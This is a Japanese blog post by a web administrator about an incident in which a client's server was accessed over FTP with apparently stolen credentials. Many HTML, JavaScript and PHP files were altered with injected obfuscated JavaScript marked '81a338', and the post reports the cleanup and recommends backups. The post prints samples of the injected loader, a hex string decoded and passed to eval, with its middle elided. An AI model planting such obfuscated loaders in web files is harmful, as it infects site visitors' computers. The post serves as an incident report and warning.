WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

サブコンテンツ

危険な高額塾

タグ

管理ツール KMS認証 与沢翼 ブルートフォースアタック 関根塾 ロリポップ 詐欺 シャンプー css もざ ブラクラ Cash on Wordpress PPC 株式会社WINGOOD ping ping送信 ブラシ 山下 バックアップ SyntaxHighlighter 自己アフィリ ユーチューブマニアクス2017 脆弱性 フレンドシップメール ネットビジネス せどり DOCTYPE エディタ 上位表示 wp-login.php EC document.all Firefox アレックス式ネオせどりスクール 人物 インターネット アクセスアップ デスクトップ 原田真 ツール ライン 特定のメールアドレス 権利収入 スカイプ アフィリエイト 個人情報 レイアウト 伊藤塾 放射線 JavaScript レイアウト崩れ moza ウインドウ 固定ページ LinkShaker RMT 北川 雅嗣 コピーボタン テンプレート 新井浩 ブロック クラウド入力機能 Baidu Internet Explorer wordpress 切抜き 自動 テーマ ボタン 出店料 アフィ匠 エクスプローラー メモ 管理画面 自動化 ハート スムーズ Windows android アドセンス インペリアルゴールド アレックス Login LockDown 自己アフィリエイト ファビコン インターネットエクスプローラー メルマガ配信システム 副業術 詐欺組織 アクセス制限 バナー パズル Ban Hammer 無料 @PAGES explorer iphone ランキング postpost MT tool 株式会社SRシステム FTP SEO マイクロソフト Thunderbird トレンドアフィリエイト ツイッター トレンドキーワード レビュー Newpost Catch 秀吉塾天下統一 ネットガレージ CS6 大西良幸 Windows 7 スマホ セキュリティ Extension Manager クリックランキング ソースコード 大園式転売塾 伊藤 虎太郎 getElementByTagName 宮田麗花 短縮URL ぼかし 加藤 秀吉 サイト改ざん IBS twitter 大園麗花 WEB インフォトップ アンダーグラウンドメソッド Tiger-Wing html 到達率 MasterCollection google 加工 アイコン 比較 クロスアフィリエイト 優先順位 無料オファー KMSpico カスタマイズ 石井匠 グラデーション MovableTYpe ムーバブルタイプ FireWorks トラフィック ネットゲーム 音量アイコン プロファイル SKナレッジ ECサイト Adobe 量産 個人情報流出 高額塾 復元 賢威 エキスパートメール 久積篤史 WP 与沢翼×蝶乃舞 インターネットビジネススクール ヤフー ネットビジネス大全集 wpXサーバー 配布 株式会社Free Agent Style マニュアル 表示 RSS Includes Pages Yahoo 改ざん 日本語入力変換ソフト YouTube Maniax 2017 PHP フォローマティック 土屋ひろし getElementById 伊藤虎太郎 定型文 XHTML 株式会社ニュース office スタイルシート バイドゥー BBIZ 転売大園塾 マルウエア 81a338 ライブチャット ヤフーショッピング force puzzle サンタ SmoothScroll.js タイガーウイング 不正アクセス ビジネス IE 立体 短縮URLツール スクロール HTML4.0 滑らか Favicon ブラウザ 三橋美仁 既得権益 functions.php .htaccess Wordpress Content Slide Chrome ソース IP system クラウド変換 百度 ヤフオク 情報商材 Youtube ウイルス ライオンアフィリエイト 申請金ビジネス Google Maps レタープレス ネットショップ Agency Business ネットビジネス最後の楽園 エクスチェンジ モザイク CS5 流出 BUYMA 背景 Diamond Affiliate Masters Program 無断送信 株式会社バンザイ 不労所得の神 ワードプレス 小笠原健一 ソフト 中山秀人 伊藤 歩 ネオヒルズアカデミー 高速ゲーム ドメイン 村上省吾 プロモーション Google Maps API がら空きビジネス レンタルサーバー 改竄 リンクシェイカー High Concept Marketing 球体 掲示板 画像 CGI 登録禁止 株式会社SRシステム ブロックポリシー 関根義光 大園転売塾 followmatic Line 感染 秒速で1億円稼ぐ男 やしろひろたみ クラック 切り抜き プラグイン 蝶乃舞 タスクバー 不正送信 池田純矢 RSS バイマ DTD ざくざく君 アンダーグラウンドアフィリエイトクラブ 特権ビジネス やしろ塾 株式会社A-ブログレス

アーカイブ

エステトラブル

このページの先頭へ